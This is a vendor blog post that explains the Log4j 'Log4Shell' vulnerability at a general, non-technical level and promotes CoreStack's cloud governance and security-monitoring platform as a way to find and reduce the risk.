How to Ensure You are Protected from Log4j and Similar Vulnerabilities
The Log4j vulnerability, which could potentially impact the entire internet, is making headlines, and if you are scrambling to address it, you are not alone. At CoreStack, our teams spurred into action immediately to audit our code for this vulnerability, and we were relieved to reconfirm that our products are safe. As a cloud governance company that helps enterprises identify and mitigate security risks, we now feel empowered to help our customers address this flaw.
Let’s take a minute to understand what the Log4j vulnerability is all about. Log4j is a shortened name for CVE-2021-44228, aka “Log4Shell,” a flaw disclosed within the popular Log4j Java-based logging library. Millions of websites and applications use this library to perform an almost mundane activity — logging information. Based on their severity, logs can be helpful to identify and correlate important events such as a drop in performance or user login/logout timestamps or by developers for troubleshooting.
It was found that the code used within this library is susceptible to the remote code execution (RCE) exploit technique. Usually, the logging system is supposed to just use the text of the log message, add a timestamp, a severity level (debug, info, alert, emergency), and other information before sending it to a logging server to record that event.
But, to exploit this vulnerability, a specially coded string is sent in the log message to trick the logging system into interpreting and executing the log message. Specifically, the logging system under the influence of this coded string initiates Lightweight Directory Access Protocol (LDAP) transaction to an external command-and-control server (C&C) from the Java Naming and Directory Interface (JNDI), resulting in that C&C server responding with a malicious java file that takes over the target system. Cyber-criminals can completely take over websites and online applications, allowing them to steal data, money, as well as access. A recent update shows that the breached machines were used for data exfiltration and even to set up crypto mining servers.
According to data from cybersecurity firm Check Point, more than 100 hacking attempts per minute have been occurring as of writing this post.
Jen Easterly, head of the Department of Homeland Security's Cybersecurity and Infrastructure Security Agency (CISA), stated it to be one of the most severe flaws she has seen in her career. Easterly said a growing set of hackers are actively exploiting the vulnerability.
How CoreStack can help?
CoreStack can help organizations implement proactive and preventive governance guardrails. We can help identify and mitigate risks to your environment. The vulnerability reports and compliance assessments available in CoreStack’s continuous governance platform prove to be very helpful with this. CoreStack’s platform has anomaly detection mechanisms to alert on changes to the infrastructure, such as spikes in network traffic, CPU usage, utilization, and cloud costs.
As Log4j takes over the server, there will be a bump in access privileges, typical for any command-and-control takeover. CoreStack’s SecOps Posture Dashboard provides visibility and actionable alerts to threats, vulnerabilities, and guardrail assessment failures. Using CoreStack’s compliance assessments, checks can be added quickly so that customers can use them to assess their preparedness. A combination of manual and automatic checks will be needed to address this vulnerability. Implementing solid tagging governance and using templates help build uniform security and compliance footprint across your cloud infrastructure.
For more detailed information about CoreStack’s solution for continuous and autonomous cloud security, sign up for a demo at corestack.io/discover
More information on this security flaw that could impact the entire Internet can be found here: